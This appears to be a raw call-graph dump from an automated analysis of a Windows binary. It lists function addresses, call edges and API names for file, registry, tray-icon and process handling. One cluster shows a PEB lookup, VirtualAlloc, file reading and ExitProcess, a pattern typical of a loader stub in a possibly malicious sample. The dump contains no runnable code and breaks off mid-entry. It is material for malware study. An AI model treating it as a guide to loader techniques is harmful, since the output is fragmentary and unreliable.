95198->95255 95256 3df6bf 23 API calls 95198->95256 95257 38a8c7 22 API calls __fread_nolock 95198->95257 95200 3d03d9 95200->95200 95202->95198 95203->95198 95206->95186 95258 405c0c 82 API calls 95207->95258 95211->95186 95215->95211 95259 3f359c 82 API calls __wsopen_s 95215->95259 95237 38ec76 messages 95219->95237 95220 39fddb 22 API calls 95220->95237 95221 3a0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95221->95237 95222 38fef7 95235 38ed9d messages 95222->95235 95263 38a8c7 22 API calls __fread_nolock 95222->95263 95225 3d4b0b 95265 3f359c 82 API calls __wsopen_s 95225->95265 95226 38a8c7 22 API calls 95226->95237 95227 3d4600 95227->95235 95262 38a8c7 22 API calls __fread_nolock 95227->95262 95233 38fbe3 95233->95235 95236 3d4bdc 95233->95236 95242 38f3ae messages 95233->95242 95234 38a961 22 API calls 95234->95237 95235->95198 95266 3f359c 82 API calls __wsopen_s 95236->95266 95237->95220 95237->95221 95237->95222 95237->95225 95237->95226 95237->95227 95237->95233 95237->95234 95237->95235 95238 3a00a3 29 API calls pre_c_initialization 95237->95238 95240 3d4beb 95237->95240 95241 3a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95237->95241 95237->95242 95260 3901e0 208 API calls 2 library calls 95237->95260 95261 3906a0 41 API calls messages 95237->95261 95238->95237 95267 3f359c 82 API calls __wsopen_s 95240->95267 95241->95237 95242->95235 95264 3f359c 82 API calls __wsopen_s 95242->95264 95243->95198 95244->95198 95245->95198 95246->95198 95247->95198 95248->95198 95249->95198 95250->95198 95251->95198 95252->95196 95253->95215 95254->95198 95255->95198 95256->95198 95257->95198 95258->95215 95259->95200 95260->95237 95261->95237 95262->95235 95263->95235 95264->95235 95265->95235 95266->95240 95267->95235 95268 38f7bf 95269 38f7d3 95268->95269 95270 38fcb6 95268->95270 95271 38fcc2 95269->95271 95273 39fddb 22 API calls 95269->95273 95363 38aceb 23 API calls messages 95270->95363 95364 38aceb 23 API calls messages 95271->95364 95275 38f7e5 95273->95275 95275->95271 95276 38f83e 95275->95276 95277 38fd3d 95275->95277 95292 38ed9d messages 95276->95292 95303 391310 95276->95303 95365 3f1155 22 API calls 95277->95365 95280 38fef7 95280->95292 95367 38a8c7 22 API calls __fread_nolock 95280->95367 95283 3d4b0b 95369 3f359c 82 API calls __wsopen_s 95283->95369 95284 38a8c7 22 API calls 95301 38ec76 messages 95284->95301 95285 3d4600 95285->95292 95366 38a8c7 22 API calls __fread_nolock 95285->95366 95291 38fbe3 95291->95292 95295 3d4bdc 95291->95295 95302 38f3ae messages 95291->95302 95293 38a961 22 API calls 95293->95301 95294 3a00a3 29 API calls pre_c_initialization 95294->95301 95370 3f359c 82 API calls __wsopen_s 95295->95370 95297 3a0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95297->95301 95298 3a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95298->95301 95299 3d4beb 95371 3f359c 82 API calls __wsopen_s 95299->95371 95300 39fddb 22 API calls 95300->95301 95301->95280 95301->95283 95301->95284 95301->95285 95301->95291 95301->95292 95301->95293 95301->95294 95301->95297 95301->95298 95301->95299 95301->95300 95301->95302 95361 3901e0 208 API calls 2 library calls 95301->95361 95362 3906a0 41 API calls messages 95301->95362 95302->95292 95368 3f359c 82 API calls __wsopen_s 95302->95368 95304 3917b0 95303->95304 95305 391376 95303->95305 95469 3a0242 5 API calls __Init_thread_wait 95304->95469 95306 391390 95305->95306 95307 3d6331 95305->95307 95372 391940 95306->95372 95474 40709c 208 API calls 95307->95474 95311 3917ba 95314 3917fb 95311->95314 95315 389cb3 22 API calls 95311->95315 95313 3d633d 95313->95301 95318 3d6346 95314->95318 95320 39182c 95314->95320 95323 3917d4 95315->95323 95316 391940 9 API calls 95317 3913b6 95316->95317 95317->95314 95319 3913ec 95317->95319 95475 3f359c 82 API calls __wsopen_s 95318->95475 95319->95318 95343 391408 __fread_nolock 95319->95343 95471 38aceb 23 API calls messages 95320->95471 95470 3a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95323->95470 95324 391839 95472 39d217 208 API calls 95324->95472 95327 3d636e 95476 3f359c 82 API calls __wsopen_s 95327->95476 95328 39152f 95330 39153c 95328->95330 95331 3d63d1 95328->95331 95333 391940 9 API calls 95330->95333 95478 405745 54 API calls _wcslen 95331->95478 95334 391549 95333->95334 95338 3d64fa 95334->95338 95340 391940 9 API calls 95334->95340 95335 39fddb 22 API calls 95335->95343 95336 391872 95473 39faeb 23 API calls 95336->95473 95337 39fe0b 22 API calls 95337->95343 95347 3d6369 95338->95347 95480 3f359c 82 API calls __wsopen_s 95338->95480 95345 391563 95340->95345 95342 38ec40 208 API calls 95342->95343 95343->95324 95343->95327 95343->95328 95343->95335 95343->95337 95343->95342 95344 3d63b2 95343->95344 95343->95347 95477 3f359c 82 API calls __wsopen_s 95344->95477 95345->95338 95350 3915c7 messages 95345->95350 95479 38a8c7 22 API calls __fread_nolock 95345->95479 95347->95301 95349 391940 9 API calls 95349->95350 95350->95336 95350->95338 95350->95347 95350->95349 95352 39167b messages 95350->95352 95382 3f83da 95350->95382 95385 386216 95350->95385 95390 409b55 95350->95390 95396 3ff0ec 95350->95396 95405 3f744a 95350->95405 95461 386246 95350->95461 95465 40958b 95350->95465 95351 39171d 95351->95301 95352->95351 95468 39ce17 22 API calls messages 95352->95468 95361->95301 95362->95301 95363->95271 95364->95277 95365->95292 95366->95292 95367->95292 95368->95292 95369->95292 95370->95299 95371->95292 95373 39195d 95372->95373 95374 391981 95372->95374 95381 3913a0 95373->95381 95483 3a0242 5 API calls __Init_thread_wait 95373->95483 95481 3a0242 5 API calls __Init_thread_wait 95374->95481 95377 39198b 95377->95373 95482 3a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95377->95482 95378 398727 95378->95381 95484 3a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95378->95484 95381->95316 95485 3f98e3 95382->95485 95384 3f83ea 95384->95350 95386 386246 CloseHandle 95385->95386 95387 38621e 95386->95387 95388 386246 CloseHandle 95387->95388 95389 38622d messages 95388->95389 95389->95350 95394 409b68 95390->95394 95391 387510 53 API calls 95392 409bd5 95391->95392 95593 3f0eea 95392->95593 95394->95391 95395 409b77 95394->95395 95395->95350 95397 387510 53 API calls 95396->95397 95398 3ff126 95397->95398 95638 389e90 95398->95638 95400 3ff136 95401 3ff15b 95400->95401 95402 38ec40 208 API calls 95400->95402 95404 3ff15f 95401->95404 95666 389c6e 22 API calls 95401->95666 95402->95401 95404->95350 95406 3f7474 95405->95406 95407 3f7469 95405->95407 95410 38a961 22 API calls 95406->95410 95444 3f7554 95406->95444 95682 38b567 39 API calls 95407->95682 95409 39fddb 22 API calls 95411 3f7587 95409->95411 95413 3f7495 95410->95413 95412 39fe0b 22 API calls 95411->95412 95414 3f7598 95412->95414 95415 38a961 22 API calls 95413->95415 95416 386246 CloseHandle 95414->95416 95417 3f749e 95415->95417 95418 3f75a3 95416->95418 95419 387510 53 API calls 95417->95419 95420 38a961 22 API calls 95418->95420 95421 3f74aa 95419->95421 95423 3f75ab 95420->95423 95683 38525f 22 API calls 95421->95683 95425 386246 CloseHandle 95423->95425 95424 3f74bf 95684 386350 95424->95684 95427 3f75b2 95425->95427 95429 387510 53 API calls 95427->95429 95431 3f75be 95429->95431 95430 3f754a 95695 38b567 39 API calls 95430->95695 95433 386246 CloseHandle 95431->95433 95436 3f75c8 95433->95436 95435 3f7502 95435->95430 95437 3f7506 95435->95437 95439 385745 5 API calls 95436->95439 95438 389cb3 22 API calls 95437->95438 95440 3f7513 95438->95440 95441 3f75e2 95439->95441 95694 3ed2c1 26 API calls 95440->95694 95442 3f76de GetLastError 95441->95442 95443 3f75ea 95441->95443 95446 3f76f7 95442->95446 95696 3853de 27 API calls messages 95443->95696 95444->95409 95459 3f76a4 95444->95459 95448 386216 CloseHandle 95446->95448 95448->95459 95449 3f75f8 95697 3853c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95449->95697 95450 3f751c 95450->95430 95452 3f7645 95453 39fddb 22 API calls 95452->95453 95455 3f7679 95453->95455 95454 3f75ff 95454->95452 95456 3eccff 4 API calls 95454->95456 95457 38a961 22 API calls 95455->95457 95456->95452 95458 3f7686 95457->95458 95458->95459 95698 3e417d 22 API calls __fread_nolock 95458->95698 95459->95350 95462 38625f 95461->95462 95463 386250 95461->95463 95462->95463 95464 386264 CloseHandle 95462->95464 95463->95350 95464->95463 95711 407f59 95465->95711 95467 40959b 95467->95350 95468->95352 95469->95311 95470->95314 95471->95324 95472->95336 95473->95336 95474->95313 95475->95347 95476->95347 95477->95347 95478->95345 95479->95350 95480->95347 95481->95377 95482->95373 95483->95378 95484->95381 95486 3f99e8 95485->95486 95487 3f9902 95485->95487 95577 3f9caa 39 API calls 95486->95577 95488 39fddb 22 API calls 95487->95488 95490 3f9909 95488->95490 95491 39fe0b 22 API calls 95490->95491 95493 3f991a 95491->95493 95492 3f99ca 95492->95384 95494 386246 CloseHandle 95493->95494 95496 3f9925 95494->95496 95495 3f9ac5 95536 3f1e96 95495->95536 95498 38a961 22 API calls 95496->95498 95502 3f992d 95498->95502 95499 3f9acc 95540 3eccff 95499->95540 95500 3f99a2 95500->95492 95500->95495 95501 3f9a33 95500->95501 95503 387510 53 API calls 95501->95503 95504 386246 CloseHandle 95502->95504 95511 3f9a3a 95503->95511 95505 3f9934 95504->95505 95544 387510 95505->95544 95507 3f9abb 95585 3ecd57 30 API calls 95507->95585 95511->95507 95530 3f9a6e 95511->95530 95512 3f9aa8 95512->95492 95515 386246 CloseHandle 95512->95515 95514 386246 CloseHandle 95517 3f994a 95514->95517 95518 3f9b1e 95515->95518 95567 385745 95517->95567 95522 386216 CloseHandle 95518->95522 95519 3f9a8e 95521 3833c6 22 API calls 95519->95521 95526 3f9a9c 95521->95526 95522->95492 95525 3f99c2 95528 386216 CloseHandle 95525->95528 95584 3ecd57 30 API calls 95526->95584 95527 3f995d 95575 3853de 27 API calls messages 95527->95575 95528->95492 95578 386270 95530->95578 95532 3f996b 95576 3853c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95532->95576 95534 3f9972 95534->95500 95535 3eccff 4 API calls 95534->95535 95535->95500 95537 3f1e9f 95536->95537 95538 3f1ea4 95536->95538 95586 3f0f67 24 API calls __fread_nolock 95537->95586 95538->95499 95541 3ecd0e 95540->95541 95542 3ecd19 WriteFile 95540->95542 95587 3ecc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95541->95587 95542->95512 95545 387525 95544->95545 95561 387522 95544->95561 95546 38755b 95545->95546 95547 38752d 95545->95547 95551 3c500f 95546->95551 95552 38756d 95546->95552 95557 3c50f6 95546->95557 95588 3a51c6 26 API calls 95547->95588 95549 38753d 95556 39fddb 22 API calls 95549->95556 95560 39fe0b 22 API calls 95551->95560 95566 3c5088 95551->95566 95589 39fb21 51 API calls 95552->95589 95553 3c510e 95553->95553 95558 387547 95556->95558 95591 3a5183 26 API calls 95557->95591 95559 389cb3 22 API calls 95558->95559 95559->95561 95562 3c5058 95560->95562 95561->95514 95563 39fddb 22 API calls 95562->95563 95564 3c507f 95563->95564 95565 389cb3 22 API calls 95564->95565 95565->95566 95590 39fb21 51 API calls 95566->95590 95568 38575c CreateFileW 95567->95568 95569 3c4035 95567->95569 95570 38577b 95568->95570 95569->95570 95571 3c403b CreateFileW 95569->95571 95570->95525 95570->95527 95571->95570 95572 3c4063 95571->95572 95592 3854c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95572->95592 95574 3c406e 95574->95570 95575->95532 95576->95534 95577->95500 95579 39fe0b 22 API calls 95578->95579 95580 386295 95579->95580 95581 39fddb 22 API calls 95580->95581 95582 3862a3 95581->95582 95582->95519 95583 38a8c7 22 API calls __fread_nolock 95582->95583 95583->95519 95584->95512 95585->95512 95586->95538 95587->95542 95588->95549 95589->95549 95590->95557 95591->95553 95592->95574 95594 3f0ef7 95593->95594 95595 39fddb 22 API calls 95594->95595 95596 3f0efe 95595->95596 95599 3ef2fb 95596->95599 95598 3f0f38 95598->95395 95600 38aec9 22 API calls 95599->95600 95601 3ef30e CharLowerBuffW 95600->95601 95604 3ef321 95601->95604 95602 384c6d 22 API calls 95602->95604 95603 3ef35f 95605 3ef371 95603->95605 95632 384c6d 95603->95632 95604->95602 95604->95603 95616 3ef32b ___scrt_fastfail 95604->95616 95607 39fe0b 22 API calls 95605->95607 95611 3ef39f 95607->95611 95610 3ef3fe 95613 39fddb 22 API calls 95610->95613 95610->95616 95612 3ef3c1 95611->95612 95635 3ef233 22 API calls 95611->95635 95617 3ef452 95612->95617 95614 3ef418 95613->95614 95615 39fe0b 22 API calls 95614->95615 95615->95616 95616->95598 95618 38a961 22 API calls 95617->95618 95619 3ef484 95618->95619 95620 38a961 22 API calls 95619->95620 95621 3ef48d 95620->95621 95622 38a961 22 API calls 95621->95622 95624 3ef496 95622->95624 95623 3ef75a 95623->95610 95624->95623 95625 3a6388 GetStringTypeW 95624->95625 95626 386b57 22 API calls 95624->95626 95627 3849bd 22 API calls 95624->95627 95629 3ef452 41 API calls 95624->95629 95630 3a62d1 39 API calls 95624->95630 95636 3a63b2 GetStringTypeW _strftime 95624->95636 95637 38a8c7 22 API calls __fread_nolock 95624->95637 95625->95624 95626->95624 95627->95624 95629->95624 95630->95624 95633 38aec9 22 API calls 95632->95633 95634 384c78 95633->95634 95634->95605 95635->95611 95636->95624 95637->95624 95639 386270 22 API calls 95638->95639 95664 389eb5 95639->95664 95640 389fd2 95668 38a4a1 95640->95668 95642 389fec 95642->95400 95645 3cf7c4 95680 3e96e2 84 API calls __wsopen_s 95645->95680 95646 3cf699 95653 39fddb 22 API calls 95646->95653 95648 38a405 95648->95642 95681 3e96e2 84 API calls __wsopen_s 95648->95681 95651 38a6c3 22 API calls 95651->95664 95652 3cf7d2 95655 38a4a1 22 API calls 95652->95655 95654 3cf754 95653->95654 95657 39fe0b 22 API calls 95654->95657 95656 3cf7e8 95655->95656 95656->95642 95659 38a12c __fread_nolock 95657->95659 95659->95645 95659->95648 95660 38a587 22 API calls 95660->95664 95661 38aec9 22 API calls 95662 38a0db CharUpperBuffW 95661->95662 95676 38a673 22 API calls 95662->95676 95664->95640 95664->95645 95664->95646 95664->95648 95664->95651 95664->95659 95664->95660 95664->95661 95665 38a4a1 22 API calls 95664->95665 95667 384573 41 API calls _wcslen 95664->95667 95677 3848c8 23 API calls 95664->95677 95678 3849bd 22 API calls __fread_nolock 95664->95678 95679 38a673 22 API calls 95664->95679 95665->95664 95666->95404 95667->95664 95669 38a52b 95668->95669 95675 38a4b1 __fread_nolock 95668->95675 95671 39fe0b 22 API calls 95669->95671 95670 39fddb 22 API calls 95672 38a4b8 95670->95672 95671->95675 95673 38a4d6 95672->95673 95674 39fddb 22 API calls 95672->95674 95673->95642 95674->95673 95675->95670 95676->95664 95677->95664 95678->95664 95679->95664 95680->95652 95681->95642 95682->95406 95683->95424 95685 386362 95684->95685 95686 3c4a51 95684->95686 95699 386373 95685->95699 95709 384a88 22 API calls __fread_nolock 95686->95709 95689 3c4a5b 95691 3c4a67 95689->95691 95710 38a8c7 22 API calls __fread_nolock 95689->95710 95690 38636e 95690->95430 95693 3ed4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 95690->95693 95693->95435 95694->95450 95695->95444 95696->95449 95697->95454 95698->95459 95700 3863b6 __fread_nolock 95699->95700 95701 386382 95699->95701 95700->95690 95701->95700 95702 3c4a82 95701->95702 95703 3863a9 95701->95703 95705 39fddb 22 API calls 95702->95705 95704 38a587 22 API calls 95703->95704 95704->95700 95706 3c4a91 95705->95706 95707 39fe0b 22 API calls 95706->95707 95708 3c4ac5 __fread_nolock 95707->95708 95709->95689 95710->95691 95712 387510 53 API calls 95711->95712 95713 407f90 95712->95713 95717 407fd5 messages 95713->95717 95749 408cd3 95713->95749 95715 40844f 95790 408ee4 60 API calls 95715->95790 95717->95467 95719 40845e 95721 40828f 95719->95721 95722 40846a 95719->95722 95720 408049 95720->95717 95723 387510 53 API calls 95720->95723 95736 408281 95720->95736 95781 3e417d 22 API calls __fread_nolock 95720->95781 95782 40851d 42 API calls _strftime 95720->95782 95762 407e86 95721->95762 95722->95717 95723->95720 95728 4082c8 95777 39fc70 95728->95777 95731 408302 95784 3863eb 22 API calls 95731->95784 95732 4082e8 95783 3f359c 82 API calls __wsopen_s 95732->95783 95735 4082f3 GetCurrentProcess TerminateProcess 95735->95731 95736->95715 95736->95721 95737 408311 95785 386a50 22 API calls 95737->95785 95739 40832a 95747 408352 95739->95747 95786 3904f0 22 API calls 95739->95786 95741 4084c5 95741->95717 95745 4084d9 FreeLibrary 95741->95745 95742 408341 95787 408b7b 75 API calls 95742->95787 95745->95717 95747->95741 95788 3904f0 22 API calls 95747->95788 95789 38aceb 23 API calls messages 95747->95789 95791 408b7b 75 API calls 95747->95791 95750 38aec9 22 API calls 95749->95750 95751 408cee CharLowerBuffW 95750->95751 95792 3e8e54 95751->95792 95755 38a961 22 API calls 95756 408d2a 95755->95756 95799 386d25 22 API calls __fread_nolock 95756->95799 95758 408d3e 95759 3893b2 22 API calls 95758->95759 95761 408d48 _wcslen 95759->95761 95760 408e5e _wcslen 95760->95720 95761->95760 95800 40851d 42 API calls _strftime 95761->95800 95763 407ea1 95762->95763 95767 407eec 95762->95767 95764 39fe0b 22 API calls 95763->95764 95766 407ec3 95764->95766 95765 39fddb 22 API calls 95765->95766 95766->95765 95766->95767 95768 409096 95767->95768 95769 4092ab messages 95768->95769 95776 4090ba _strcat _wcslen 95768->95776 95769->95728 95770 38b6b5 39 API calls 95770->95776 95771 38b38f 39 API calls 95771->95776 95772 38b567 39 API calls 95772->95776 95773 387510 53 API calls 95773->95776 95774 3aea0c 21 API calls ___std_exception_copy 95774->95776 95776->95769 95776->95770 95776->95771 95776->95772 95776->95773 95776->95774 95803 3eefae 24 API calls _wcslen 95776->95803 95779 39fc85 95777->95779 95778 39fd1d VirtualProtect 95780 39fceb 95778->95780 95779->95778 95779->95780 95780->95731 95780->95732 95781->95720 95782->95720 95783->95735 95784->95737 95785->95739 95786->95742 95787->95747 95788->95747 95789->95747 95790->95719 95791->95747 95794 3e8e74 _wcslen 95792->95794 95793 3e8f63 95793->95755 95793->95761 95794->95793 95796 3e8f68 95794->95796 95797 3e8ea9 95794->95797 95796->95793 95802 39ce60 41 API calls 95796->95802 95797->95793 95801 39ce60 41 API calls 95797->95801 95799->95758 95800->95760 95801->95797 95802->95796 95803->95776 95804 381cd0 95805 381cdd __wsopen_s 95804->95805 95820 383e5b 95805->95820 95807 381ce2 95819 381d5c 95807->95819 95831 3821dd 95807->95831 95809 381cef 95809->95819 95842 382042 95809->95842 95811 381cf8 95812 381cfc GetFullPathNameW 95811->95812 95811->95819 95813 386b57 22 API calls 95812->95813 95814 381d28 95813->95814 95815 386b57 22 API calls 95814->95815 95816 381d35 95815->95816 95817 3c2741 95816->95817 95818 386b57 22 API calls 95816->95818 95818->95819 95821 383e82 95820->95821 95830 383f9f 95820->95830 95822 39fe0b 22 API calls 95821->95822 95821->95830 95824 383ea9 95822->95824 95823 39fe0b 22 API calls 95828 383f1e 95823->95828 95824->95823 95827 389e90 86 API calls 95827->95828 95828->95827 95829 38a4a1 22 API calls 95828->95829 95828->95830 95854 383ff7 95828->95854 95860 3f0a59 22 API calls 95828->95860 95829->95828 95830->95807 95840 382299 95831->95840 95832 382593 95862 382932 82 API calls 95832->95862 95834 3c29d0 95863 382817 22 API calls 95834->95863 95837 3c2823 95864 3f359c 82 API calls __wsopen_s 95837->95864 95839 382817 22 API calls 95839->95840 95840->95832 95840->95834 95840->95837 95840->95839 95841 38252b 95840->95841 95861 382932 82 API calls 95840->95861 95841->95809 95853 38204e 95842->95853 95843 382129 95885 382996 22 API calls 95843->95885 95845 382133 95845->95811 95846 3c27c5 95887 3f359c 82 API calls __wsopen_s 95846->95887 95847 389cb3 22 API calls 95847->95853 95850 38213a 95886 3f359c 82 API calls __wsopen_s 95850->95886 95853->95843 95853->95845 95853->95846 95853->95847 95853->95850 95865 38adf0 95853->95865 95870 38652c 95853->95870 95855 38400a 95854->95855 95857 3840ae 95854->95857 95856 39fe0b 22 API calls 95855->95856 95859 38403c 95855->95859 95856->95859 95857->95828 95858 39fddb 22 API calls 95858->95859 95859->95857 95859->95858 95860->95828 95861->95840 95862->95841 95863->95837 95864->95841 95866 38ae01 95865->95866 95869 38ae1c messages 95865->95869 95867 38aec9 22 API calls 95866->95867 95868 38ae09 CharUpperBuffW 95867->95868 95868->95869 95869->95853 95871 38a961 22 API calls 95870->95871 95884 386540 95871->95884 95872 3866e4 95873 3866fc 95872->95873 95883 3867a0 95872->95883 95876 38671b 95873->95876 95882 38674a 95873->95882 95888 38a8c7 22 API calls __fread_nolock 95873->95888 95875 3c4b4a 95891 3f359c 82 API calls __wsopen_s 95875->95891 95889 39db43 23 API calls 95876->95889 95877 3c4b39 95877->95853 95878 38515f 22 API calls 95878->95884 95882->95853 95890 3f359c 82 API calls __wsopen_s 95883->95890 95884->95872 95884->95875 95884->95878 95884->95883 95885->95845 95886->95845 95887->95845 95888->95876 95889->95882 95890->95877 95891->95882 95892 3d3f75 95903 39ceb1 95892->95903 95894 3d3f8b 95895 3d4006 95894->95895 95970 39e300 23 API calls 95894->95970 95912 38bf40 95895->95912 95899 3d3fe6 95900 3d4052 95899->95900 95971 3f1abf 22 API calls 95899->95971 95901 3d4a88 95900->95901 95972 3f359c 82 API calls __wsopen_s 95900->95972 95904 39cebf 95903->95904 95905 39ced2 95903->95905 95973 38aceb 23 API calls messages 95904->95973 95907 39cf05 95905->95907 95908 39ced7 95905->95908 95974 38aceb 23 API calls messages 95907->95974 95909 39fddb 22 API calls 95908->95909 95911 39cec9 95909->95911 95911->95894 95913 38adf0 23 API calls 95912->95913 95914 38bf9d 95913->95914 95915 38bfa9 95914->95915 95916 3d04b6 95914->95916 95918 3d04c6 95915->95918 95919 38c01e 95915->95919 95989 3f359c 82 API calls __wsopen_s 95916->95989 95990 3f359c 82 API calls __wsopen_s 95918->95990 95975 38ac91 95919->95975 95922 3e7120 22 API calls 95939 38c039 __fread_nolock messages 95922->95939 95923 38c7da 95927 39fe0b 22 API calls 95923->95927 95932 38c808 __fread_nolock 95927->95932 95929 3d04f5 95933 3d055a 95929->95933 95991 39d217 208 API calls 95929->95991 95937 39fe0b 22 API calls 95932->95937 95953 38c603 95933->95953 95992 3f359c 82 API calls __wsopen_s 95933->95992 95934 38ec40 208 API calls 95934->95939 95935 38af8a 22 API calls 95935->95939 95936 3d091a 96002 3f3209 23 API calls 95936->96002 95942 38c350 __fread_nolock messages 95937->95942 95939->95922 95939->95923 95939->95929 95939->95932 95939->95933 95939->95934 95939->95935 95939->95936 95941 38c237 95939->95941 95943 3d08a5 95939->95943 95947 3d0591 95939->95947 95950 3d08f6 95939->95950 95952 38bbe0 40 API calls 95939->95952 95939->95953 95959 39fddb 22 API calls 95939->95959 95964 3d09bf 95939->95964 95968 39fe0b 22 API calls 95939->95968 95979 38ad81 95939->95979 95994 3e7099 22 API calls __fread_nolock 95939->95994 95995 405745 54 API calls _wcslen 95939->95995 95996 39aa42 22 API calls messages 95939->95996 95997 3ef05c 40 API calls 95939->95997 95998 38a993 41 API calls 95939->95998 95999 38aceb 23 API calls messages 95939->95999 95956 38c253 95941->95956 96003 38a8c7 22 API calls __fread_nolock 95941->96003 95969 38c3ac 95942->95969 95988 39ce17 22 API calls messages 95942->95988 95944 38ec40 208 API calls 95943->95944 95946 3d08cf 95944->95946 95946->95953 96000 38a81b 41 API calls 95946->96000 95993 3f359c 82 API calls __wsopen_s 95947->95993 96001 3f359c 82 API calls __wsopen_s 95950->96001 95952->95939 95953->95900 95958 3d0976 95956->95958 95962 38c297 messages 95956->95962 96004 38aceb 23 API calls messages 95958->96004 95959->95939 95962->95964 95986 38aceb 23 API calls messages 95962->95986 95964->95953 96005 3f359c 82 API calls __wsopen_s 95964->96005 95965 38c335 95965->95964 95966 38c342 95965->95966 95987 38a704 22 API calls messages 95966->95987 95968->95939 95969->95900 95970->95899 95971->95895 95972->95901 95973->95911 95974->95911 95977 38acae 95975->95977 95976 38acd1 95976->95939 95977->95976 96006 3f359c 82 API calls __wsopen_s 95977->96006 95980 3cfadb 95979->95980 95981 38ad92 95979->95981 95982 39fddb 22 API calls 95981->95982 95983 38ad99 95982->95983 96007 38adcd 95983->96007 95986->95965 95987->95942 95988->95942 95989->95918 95990->95953 95991->95933 95992->95953 95993->95953 95994->95939 95995->95939 95996->95939 95997->95939 95998->95939 95999->95939 96000->95950 96001->95953 96002->95941 96003->95956 96004->95964 96005->95953 96006->95976 96010 38addd 96007->96010 96008 38adb6 96008->95939 96009 39fddb 22 API calls 96009->96010 96010->96008 96010->96009 96011 38a961 22 API calls 96010->96011 96013 38adcd 22 API calls 96010->96013 96014 38a8c7 22 API calls __fread_nolock 96010->96014 96011->96010 96013->96010 96014->96010 96015 1a900e0 96016 1a8dd30 GetPEB 96015->96016 96017 1a90182 96016->96017 96029 1a8ffd0 96017->96029 96019 1a901ab CreateFileW 96021 1a901fa 96019->96021 96022 1a901ff 96019->96022 96022->96021 96023 1a90216 VirtualAlloc 96022->96023 96023->96021 96024 1a90234 ReadFile 96023->96024 96024->96021 96025 1a9024f 96024->96025 96026 1a8efd0 13 API calls 96025->96026 96027 1a90282 96026->96027 96028 1a902a5 ExitProcess 96027->96028 96028->96021 96030 1a8ffd9 Sleep 96029->96030 96031 1a8ffe7 96030->96031 96032 381033 96037 384c91 96032->96037 96036 381042 96038 38a961 22 API calls 96037->96038 96039 384cff 96038->96039 96045 383af0 96039->96045 96041 384d9c 96042 381038 96041->96042 96048 3851f7 22 API calls __fread_nolock 96041->96048 96044 3a00a3 29 API calls __onexit 96042->96044 96044->96036 96049 383b1c 96045->96049 96048->96041 96050 383b0f 96049->96050 96051 383b29 96049->96051 96050->96041 96051->96050 96052 383b30 RegOpenKeyExW 96051->96052 96052->96050 96053 383b4a RegQueryValueExW 96052->96053 96054 383b6b 96053->96054 96055 383b80 RegCloseKey 96053->96055 96054->96055 96055->96050 96056 383156 96059 383170 96056->96059 96060 383187 96059->96060 96061 3831eb 96060->96061 96062 38318c 96060->96062 96103 3831e9 96060->96103 96064 3c2dfb 96061->96064 96065 3831f1 96061->96065 96066 383199 96062->96066 96067 383265 PostQuitMessage 96062->96067 96063 3831d0 DefWindowProcW 96068 38316a 96063->96068 96115 3818e2 10 API calls 96064->96115 96069 3831f8 96065->96069 96070 38321d SetTimer RegisterWindowMessageW 96065->96070 96072 3c2e7c 96066->96072 96073 3831a4 96066->96073 96067->96068 96074 3c2d9c 96069->96074 96075 383201 KillTimer 96069->96075 96070->96068 96077 383246 CreatePopupMenu 96070->96077 96120 3ebf30 34 API calls ___scrt_fastfail 96072->96120 96078 3c2e68 96073->96078 96079 3831ae 96073->96079 96081 3c2dd7 MoveWindow 96074->96081 96082 3c2da1 96074->96082 96111 3830f2 Shell_NotifyIconW ___scrt_fastfail 96075->96111 96076 3c2e1c 96116 39e499 42 API calls 96076->96116 96077->96068 96104 3ec161 96078->96104 96086 3c2e4d 96079->96086 96087 3831b9 96079->96087 96081->96068 96089 3c2dc6 SetFocus 96082->96089 96090 3c2da7 96082->96090 96086->96063 96119 3e0ad7 22 API calls 96086->96119 96092 3831c4 96087->96092 96093 383253 96087->96093 96088 3c2e8e 96088->96063 96088->96068 96089->96068 96090->96092 96094 3c2db0 96090->96094 96091 383214 96112 383c50 DeleteObject DestroyWindow 96091->96112 96092->96063 96117 3830f2 Shell_NotifyIconW ___scrt_fastfail 96092->96117 96113 38326f 44 API calls ___scrt_fastfail 96093->96113 96114 3818e2 10 API calls 96094->96114 96099 383263 96099->96068 96101 3c2e41 96118 383837 49 API calls ___scrt_fastfail 96101->96118 96103->96063 96105 3ec179 ___scrt_fastfail 96104->96105 96106 3ec276 96104->96106 96121 383923 96105->96121 96106->96068 96108 3ec1a0 96109 3ec25f KillTimer SetTimer 96108->96109 96110 3ec251 Shell_NotifyIconW 96108->96110 96109->96106 96110->96109 96111->96091 96112->96068 96113->96099 96114->96068 96115->96076 96116->96092 96117->96101 96118->96103 96119->96103 96120->96088 96122 38393f 96121->96122 96123 383a13 96121->96123 96124 386270 22 API calls 96122->96124 96123->96108 96125 38394d 96124->96125 96126 38395a 96125->96126 96127 3c3393 LoadStringW 96125->96127 96128 386b57 22 API calls 96126->96128 96129 3c33ad 96127->96129 96130 38396f 96128->96130 96137 383994 ___scrt_fastfail 96129->96137 96143 38a8c7 22 API calls __fread_nolock 96129->96143 96131 38397c 96130->96131 96132 3c33c9 96130->96132 96131->96129 96134 383986 96131->96134 96135 386350 22 API calls 96132->96135 96136 386350 22 API calls 96134->96136 96138 3c33d7 96135->96138 96136->96137 96140 3839f9 Shell_NotifyIconW 96137->96140 96138->96137 96139 3833c6 22 API calls 96138->96139 96141 3c33f9 96139->96141 96140->96123 96142 3833c6 22 API calls 96141->96142 96142->96137 96143->96137 96144 382e37 96145 38a961 22 API calls 96144->96145 96146 382e4d 96145->96146 96223 384ae3 96146->96223 96148 382e6b 96149 383a5a 24 API calls 96148->96149 96150 382e7f 96149->96150 96151 389cb3 22 API calls 96150->96151 96152 382e8c 96151->96152 96237 384ecb 96152->96237 96155 382ead 96259 38a8c7 22 API calls __fread_nolock 96155->96259 96156 3c2cb0 96277 3f2cf9 96156->96277 96158 3c2cc3 96159 3c2ccf 96158->96159 96303 384f39 96158->96303 96165 384f39 68 API 